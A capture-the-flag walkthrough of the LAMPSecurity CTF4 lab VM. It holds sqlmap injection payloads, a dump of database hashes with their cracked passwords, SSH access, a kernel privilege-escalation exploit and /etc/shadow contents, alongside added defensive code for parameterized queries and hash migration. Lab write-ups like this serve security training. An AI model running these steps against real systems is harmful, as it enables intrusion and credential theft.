Tango Down (CTF4) : Capture The Flag (CTF) 4 Lamp Security Challenge


Lab Environment :

Victim Host : https://www.vulnhub.com/entry/lampsecurity-ctf4,83/  on VirtualBox (MacOS)
Attacking Host : KALI (On Virtual Box)
Network : Host-Only (VirtualBox)
Tools : As mentioned in the walkthrough below


Discovery :

- Find the target's IP: start the VM with its network adapter set to the Host-Only network. Since we know the subnet used by the host-only network, just run an nmap scan to identify the target's IP.

We got the below IP and services :

Nmap scan report for 192.168.56.101
Host is up (0.00043s latency).
Not shown: 96 filtered ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
631/tcp closed ipp
MAC Address: 08:00:27:37:40:F6 (Cadmus Computer Systems)


To confirm, telnet to port 25 :
root@kali:~# telnet 192.168.56.101 25

Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
220 ctf4.sas.upenn.edu ESMTP Sendmail 8.13.5/8.13.5; Sat, 24 Oct 2015 00:05:52 -0400
HELO
501 5.0.0 HELO requires domain address
VRY root
500 5.5.1 Command unrecognized: "VRY root"
help
214-2.0.0 This is sendmail version 8.13.5
214-2.0.0 Topics:
214-2.0.0 HELO EHLO MAIL RCPT DATA
214-2.0.0 RSET NOOP QUIT HELP VRFY
214-2.0.0 EXPN VERB ETRN DSN AUTH
214-2.0.0 STARTTLS
214-2.0.0 For more info use "HELP <topic>".
214-2.0.0 To report bugs in the implementation send email to
214-2.0.0 sendmail-bugs@sendmail.org.
214-2.0.0 For local information send email to Postmaster at your site.
214 2.0.0 End of HELP info
VRFY root
250 2.1.5 <root@ctf4.sas.upenn.edu>

This is the host.

Now we will do further scanning and enumeration :

Port 80 :

A normal-looking static site seems to be hosted here. Running nikto on this..

Vulnerability Assessment and Exploit :

Testing SQL Injection :
root@kali:~/vulhub/ct4# sqlmap -u http://192.168.56.101 --crawl=3
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150429}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:17:44

do you want to check for the existence of site's sitemap(.xml) [Y/n]
[01:17:46] [INFO] no links found
[01:17:46] [INFO] starting crawler
[01:17:46] [INFO] searching for links with depth 1
[01:17:46] [INFO] searching for links with depth 2
please enter number of threads? [Enter for 1 (current)]
[01:17:48] [WARNING] running in a single-thread mode. This could take a while
[01:17:48] [INFO] searching for links with depth 3
please enter number of threads? [Enter for 1 (current)] 3
[01:17:58] [INFO] starting 3 threads
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N]
[01:18:00] [INFO] sqlmap got a total of 8 targets
URL 1:
GET http://192.168.56.101:80/index.html?title=Home Page
do you want to test this URL? [Y/n/q]
>
[01:18:02] [INFO] testing URL 'http://192.168.56.101:80/index.html?title=Home Page'
[01:18:02] [INFO] using '/root/.sqlmap/output/results-10242015_0118am.csv' as the CSV results file in multiple targets mode
[01:18:02] [INFO] testing connection to the target URL
[01:18:02] [WARNING] the web server responded with an HTTP error code (404) which could interfere with the results of the tests
[01:18:02] [INFO] testing if the target URL is stable. This can take a couple of seconds
[01:18:03] [INFO] target URL is stable
[01:18:03] [INFO] testing if GET parameter 'title' is dynamic
[01:18:03] [WARNING] GET parameter 'title' does not appear dynamic
[01:18:03] [WARNING] heuristic (basic) test shows that GET parameter 'title' might not be injectable
[01:18:03] [INFO] heuristic (XSS) test shows that GET parameter 'title' might be vulnerable to XSS attacks
[01:18:03] [INFO] testing for SQL injection on GET parameter 'title'
[01:18:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:18:03] [WARNING] reflective value(s) found and filtering out
[01:18:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:18:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:18:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:18:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:18:04] [INFO] testing 'MySQL inline queries'
[01:18:04] [INFO] testing 'PostgreSQL inline queries'
[01:18:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:18:04] [INFO] testing 'Oracle inline queries'
[01:18:04] [INFO] testing 'SQLite inline queries'
[01:18:04] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:18:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:18:04] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:18:04] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[01:18:04] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:18:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:18:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:18:04] [INFO] testing 'Oracle AND time-based blind'
[01:18:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:18:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:18:05] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[01:18:06] [WARNING] GET parameter 'title' is not injectable
[01:18:06] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 2:
GET http://192.168.56.101:80/index.html?page=blog&title=Blog
do you want to test this URL? [Y/n/q]
>
[01:18:12] [INFO] testing URL 'http://192.168.56.101:80/index.html?page=blog&title=Blog'
[01:18:12] [INFO] testing connection to the target URL
[01:18:12] [WARNING] the web server responded with an HTTP error code (404) which could interfere with the results of the tests
[01:18:12] [INFO] testing if the target URL is stable. This can take a couple of seconds
[01:18:13] [INFO] target URL is stable
[01:18:13] [INFO] testing if GET parameter 'page' is dynamic
[01:18:13] [INFO] confirming that GET parameter 'page' is dynamic
[01:18:13] [INFO] GET parameter 'page' is dynamic
[01:18:13] [WARNING] heuristic (basic) test shows that GET parameter 'page' might not be injectable
[01:18:13] [INFO] testing for SQL injection on GET parameter 'page'
[01:18:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:18:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:18:13] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:18:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:18:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:18:13] [INFO] testing 'MySQL inline queries'
[01:18:13] [INFO] testing 'PostgreSQL inline queries'
[01:18:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:18:13] [INFO] testing 'Oracle inline queries'
[01:18:13] [INFO] testing 'SQLite inline queries'
[01:18:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:18:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:18:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:18:13] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[01:18:13] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:18:13] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:18:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:18:14] [INFO] testing 'Oracle AND time-based blind'
[01:18:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:18:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:18:14] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[01:18:15] [WARNING] GET parameter 'page' is not injectable
[01:18:15] [INFO] skipping previously processed GET parameter 'title'
[01:18:15] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[01:18:15] [INFO] skipping 'http://192.168.56.101:80/index.html?page=research&title=Research'
[01:18:15] [INFO] skipping 'http://192.168.56.101:80/index.html?page=contact&title=Contact'
URL 3:
GET http://192.168.56.101:80/index.html?page=blog&title=Blog&id=2
do you want to test this URL? [Y/n/q]
>
[01:18:19] [INFO] testing URL 'http://192.168.56.101:80/index.html?page=blog&title=Blog&id=2'
[01:18:19] [INFO] testing connection to the target URL
[01:18:19] [WARNING] the web server responded with an HTTP error code (404) which could interfere with the results of the tests
[01:18:19] [INFO] testing if the target URL is stable. This can take a couple of seconds
[01:18:20] [INFO] target URL is stable
[01:18:20] [INFO] skipping previously processed GET parameter 'page'
[01:18:20] [INFO] skipping previously processed GET parameter 'title'
[01:18:20] [INFO] testing if GET parameter 'id' is dynamic
[01:18:20] [INFO] confirming that GET parameter 'id' is dynamic
[01:18:20] [INFO] GET parameter 'id' is dynamic
[01:18:20] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[01:18:20] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[01:18:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:18:39] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[01:18:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[01:18:39] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[01:18:39] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[01:18:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[01:18:39] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[01:18:39] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[01:18:39] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[01:18:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[01:18:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[01:18:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[01:18:39] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[01:18:39] [INFO] testing 'MySQL inline queries'
[01:18:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:18:39] [WARNING] time-based comparison requires larger statistical model, please wait..
[01:18:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[01:18:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[01:18:49] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable
[01:18:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[01:18:49] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:18:49] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[01:18:49] [INFO] target URL appears to have 5 columns in query
[01:18:49] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 40 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=blog&title=Blog&id=2 AND 6954=6954

Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,CONCAT(0x716b707171,0x69637369434f4f546370,0x71707a7671),NULL,NULL,NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: page=blog&title=Blog&id=2 AND (SELECT * FROM (SELECT(SLEEP(5)))VbJV)
---
do you want to exploit this SQL injection? [Y/n]
[01:19:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: Apache 2.2.0, PHP 5.1.2
back-end DBMS: MySQL 5.0.11
[01:19:18] [INFO] skipping 'http://192.168.56.101:80/index.html?page=blog&title=Blog&id=5'
[01:19:18] [INFO] skipping 'http://192.168.56.101:80/index.html?page=blog&title=Blog&id=6'
[01:19:18] [INFO] skipping 'http://192.168.56.101:80/index.html?page=blog&title=Blog&id=7'
[01:19:18] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-10242015_0118am.csv'

[*] shutting down at 01:19:18
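
The `id` finding above comes down to request text being concatenated into the SQL statement. The following Python sketch is an added example, not code from the challenge application or from this walkthrough: it puts that pattern next to a hardened lookup, using an in-memory SQLite table as a stand-in for the MySQL back end. The table name, column names and rows are constructed assumptions, and the only payload used is the boolean-based one sqlmap printed.

```python
import sqlite3

# Boolean-based payload exactly as reported by sqlmap for the 'id' parameter.
REPORTED_PAYLOAD = "2 AND 6954=6954"


def make_db():
    """Constructed stand-in for the blog table (5 columns, as sqlmap counted)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE blog (id INTEGER PRIMARY KEY, title TEXT, "
        "body TEXT, author TEXT, created TEXT)"
    )
    db.executemany(
        "INSERT INTO blog VALUES (?, ?, ?, ?, ?)",
        [
            (2, "Constructed post A", "body", "user_a", "2009-03-10"),
            (5, "Constructed post B", "body", "user_b", "2009-03-11"),
        ],
    )
    return db


def build_vulnerable_sql(raw_id):
    # Vulnerable pattern: the request value becomes part of the SQL text.
    return "SELECT * FROM blog WHERE id = " + raw_id


def get_post_vulnerable(db, raw_id):
    return db.execute(build_vulnerable_sql(raw_id)).fetchall()


def get_post_hardened(db, raw_id):
    # 1) Allow-list: only a short run of ASCII digits is a valid id.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a positive integer")
    # 2) Bound parameter: the driver sends the value as data, not as SQL.
    return db.execute("SELECT * FROM blog WHERE id = ?", (int(raw_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("statement built from payload:", build_vulnerable_sql(REPORTED_PAYLOAD))
    print("vulnerable lookup rows:", len(get_post_vulnerable(db, REPORTED_PAYLOAD)))
    try:
        get_post_hardened(db, REPORTED_PAYLOAD)
    except ValueError as exc:
        print("hardened lookup rejected input:", exc)
    print("hardened lookup, id=2:", get_post_hardened(db, "2")[0][1])
```
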


Took a database dump for the user accounts and hashes :
sqlmap -u http://192.168.56.101 --crawl=5 --dbms=mysql --dump --threads=5


+++ Truncated output +++
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[01:31:14] [INFO] writing hashes to a temporary file '/tmp/sqlmap_bywwj4272/sqlmaphashes-lLP7FS.txt'
do you want to crack them via a dictionary-based attack? [y/N/q]
Database: ehks
Table: user
[6 entries]
+---------+-----------+----------------------------------+
| user_id | user_name | user_pass                        |
+---------+-----------+----------------------------------+
| 1       | dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 |
| 2       | achen     | b46265f1e7faa3beab09db5c28739380 |
| 3       | pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 |
| 4       | jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 |
| 5       | sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 |
| 6       | ghighland | 9f3eb3087298ff21843cc4e013cf355f |
+---------+-----------+----------------------------------+


++++++++++++++++

Cracking the hashes for the accounts :

1. dstevens: iliketosurf
2. achen: seventysixers
3. pmoore: Homesite
4. jdurbin: Sue1978
5. sorzek: pacman
6. ghighland: undone1

So we have all the SQL usernames and passwords now !
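
The dumped `user_pass` values are bare 32-hex-character digests with no salt, the shape of raw MD5. The following Python sketch is an added example, not part of the original walkthrough or the challenge application: it shows one way to migrate such a column by verifying against the legacy digest once at login and then replacing it with a per-user-salted PBKDF2 record. It assumes the column holds raw MD5; the record format, function names and in-memory `store` dict are hypothetical, and the accounts and passwords are constructed.

```python
import hashlib
import hmac
import os
import re

PBKDF2_ITERATIONS = 600_000          # assumption: tune for your hardware
LEGACY_MD5 = re.compile(r"[0-9a-f]{32}")


def legacy_md5(password):
    """Assumed legacy scheme: unsalted MD5 hex digest, as in the user_pass column."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password):
    """New record: scheme$iterations$salt$derived-key, with a random per-user salt."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return "pbkdf2_sha256${}${}${}".format(PBKDF2_ITERATIONS, salt.hex(), dk.hex())


def is_legacy(record):
    return LEGACY_MD5.fullmatch(record) is not None


def verify_and_upgrade(store, user, password):
    """Check a login; on success with a legacy record, rewrite it in place."""
    record = store.get(user)
    if record is None:
        return False
    if is_legacy(record):
        if not hmac.compare_digest(legacy_md5(password), record):
            return False
        store[user] = hash_password(password)   # the MD5 digest is discarded here
        return True
    parts = record.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False                             # unknown record format: refuse
    _, iterations, salt_hex, dk_hex = parts
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def accounts_still_legacy(store):
    """Accounts not yet migrated (no login since the change); force a reset for these."""
    return sorted(user for user, record in store.items() if is_legacy(record))


if __name__ == "__main__":
    # Constructed accounts and passwords, not values from the challenge.
    store = {"user_a": legacy_md5("constructed-pass-1"),
             "user_b": legacy_md5("constructed-pass-1")}
    print("same password, same legacy digest:", store["user_a"] == store["user_b"])
    print("login ok:", verify_and_upgrade(store, "user_a", "constructed-pass-1"))
    print("upgraded record prefix:", store["user_a"].split("$")[:2])
    print("still legacy:", accounts_still_legacy(store))
```
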


From Nikto we found some more paths :
==============================================
root@kali:~/vulhub/ct4# nikto -h http://192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2015-10-24 01:16:56 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.0 (Fedora)
+ Retrieved x-powered-by header: PHP/5.1.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ Server leaks inodes via ETags, header found with file /robots.txt, inode: 487720, size: 104, mtime: Tue Dec 9 23:39:44 2014
+ File/dir '/mail/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ File/dir '/conf/' in robots.txt returned a non-forbidden or redirect HTTP code (500)
+ OSVDB-3268: /sql/: Directory indexing found.
+ File/dir '/sql/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/admin/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 5 entries which should be manually viewed.
+ Apache/2.2.0 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /pages/: Directory indexing found.
+ OSVDB-3092: /pages/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ Cookie SQMSESSID created without the httponly flag
+ OSVDB-3093: /mail/src/read_body.php: SquirrelMail found
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-9624: /admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/login.php: Admin login page/section found.
+ 7500 requests: 1 error(s) and 30 item(s) reported on remote host

+ End Time: 2015-10-24 01:17:32 (GMT1) (36 seconds)
---------------------------------------------------------------------------


Trying to log in using the usernames / passwords we gathered from the previous sqlmap step :

Login successful, but we do not see any admin console, let's try other logins..


To Gain Shell :

First step, let's try to get a shell on the host. We cracked multiple username / password pairs above, so let's try some of those IDs..

I randomly picked "achen", and it works !! I have a shell now.

root@kali:~/vulhub/ct4# ssh achen@192.168.56.101
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
RSA key fingerprint is e7:70:d3:81:00:41:b8:6e:fd:31:ae:0e:00:ea:5c:b4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (RSA) to the list of known hosts.
BSD SSH 4.1
achen@192.168.56.101's password:
Last login: Tue Mar 10 12:45:06 2009
[achen@ctf4 ~]$ whoami
achen
[achen@ctf4 ~]$ id
uid=501(achen) gid=501(achen) groups=100(users),501(achen),507(admins) context=user_u:system_r:unconfined_t
[achen@ctf4 ~]$ uname -a
Linux ctf4.sas.upenn.edu 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
[achen@ctf4 ~]$ cat /etc/issue
Fedora Core release 5 (Bordeaux)
Kernel \r on an \m

[achen@ctf4 ~]$

Privilege Escalation :
After a lot of research, I got this : http://www.securityfocus.com/bid/18874/exploit. Downloaded and copied the exploit onto the victim host.




On the victim node, gave exec permissions and then ran the exploit script :


[achen@ctf4 ~]$ chmod +x zmia-jul14-2006.sh

[achen@ctf4 ~]$ ./zmia-jul14-2006.sh
wait aprox 4 min to get sh

sh-3.1# id
uid=0(root) gid=0(root) groups=100(users),501(achen),507(admins) context=user_u:system_r:unconfined_t


We are ROOT

Observation:

OS:
sh-3.1# cat /etc/issue
Fedora Core release 5 (Bordeaux)
Kernel \r on an \m

You have new mail in /var/spool/mail/achen

sh-3.1# uname -a
Linux ctf4.sas.upenn.edu 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux


Passwords :
sh-3.1# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dstevens:x:500:506:Don Stevens:/home/dstevens:/bin/bash
achen:x:501:501:Andrew Chen:/home/achen:/bin/bash
pmoore:x:502:502:Phillip Moore:/home/pmoore:/bin/bash
jdurbin:x:503:503:James Durbin:/home/jdurbin:/bin/bash
sorzek:x:504:504:Sally Orzek:/home/sorzek:/bin/bash
ghighland:x:505:505:Greg Highland:/home/ghighland:/bin/bash
ossec:x:506:508::/var/ossec:/sbin/nologin
ossecm:x:507:508::/var/ossec:/sbin/nologin
ossecr:x:508:508::/var/ossec:/sbin/nologin


sh-3.1# cat /etc/shadow
root:$1$DSHH/MlC$DH8ClhHKeagYW4PwxICZC0:14309:0:99999:7:::
bin:*:14309:0:99999:7:::
daemon:*:14309:0:99999:7:::
adm:*:14309:0:99999:7:::
lp:*:14309:0:99999:7:::
sync:*:14309:0:99999:7:::
shutdown:*:14309:0:99999:7:::
halt:*:14309:0:99999:7:::
mail:*:14309:0:99999:7:::
news:*:14309:0:99999:7:::
uucp:*:14309:0:99999:7:::
operator:*:14309:0:99999:7:::
games:*:14309:0:99999:7:::
gopher:*:14309:0:99999:7:::
ftp:*:14309:0:99999:7:::
nobody:*:14309:0:99999:7:::
dbus:!!:14309:0:99999:7:::
rpm:!!:14309:0:99999:7:::
apache:!!:14309:0:99999:7:::
distcache:!!:14309:0:99999:7:::
ntp:!!:14309:0:99999:7:::
nscd:!!:14309:0:99999:7:::
vcsa:!!:14309:0:99999:7:::
webalizer:!!:14309:0:99999:7:::
dovecot:!!:14309:0:99999:7:::
mysql:!!:14309:0:99999:7:::
netdump:!!:14309:0:99999:7:::
pcap:!!:14309:0:99999:7:::
avahi:!!:14309:0:99999:7:::
named:!!:14309:0:99999:7:::
mailnull:!!:14309:0:99999:7:::
smmsp:!!:14309:0:99999:7:::
haldaemon:!!:14309:0:99999:7:::
rpc:!!:14309:0:99999:7:::
xfs:!!:14309:0:99999:7:::
gdm:!!:14309:0:99999:7:::
rpcuser:!!:14309:0:99999:7:::
nfsnobody:!!:14309:0:99999:7:::
sshd:!!:14309:0:99999:7:::
dstevens:$1$fU8HOHqa$N542xtl0ft8NmsYkv5NFo/:14309:0:99999:7:::
achen:$1$kxyn25Oz$w.MMADGQYIq4F52hi9DUQ.:14309:0:99999:7:::
pmoore:$1$p0RXlomV$m03UsjoTZ08qG8gbWHgST0:14309:0:99999:7:::
jdurbin:$1$CYmEyuc.$FXAeZHkhywwENbqE8h0O.0:14309:0:99999:7:::
sorzek:$1$cWeWNRdU$VTtlKsoRBmhMghnkSwqCQ.:14312:0:99999:7:::
ghighland:$1$ooKvtZEY$N2RpSaIylgFlHnBkbwUGz0:14309:0:99999:7:::
ossec:!!:14312:0:99999:7:::
ossecm:!!:14312:0:99999:7:::
ossecr:!!:14312:0:99999:7:::

Netstat Output
sh-3.1# netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:mysql *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
tcp 0 0 *:58194 *:* LISTEN
tcp 0 0 *:smtp *:* LISTEN
tcp 0 0 *:imaps *:* LISTEN
tcp 0 0 *:pop3s *:* LISTEN
tcp 0 0 *:pop3 *:* LISTEN
tcp 0 0 *:imap *:* LISTEN
tcp 0 0 *:http *:* LISTEN
tcp 0 0 *:ssh *:* LISTEN
tcp 0 0 *:https *:* LISTEN


sh-3.1# df -kl
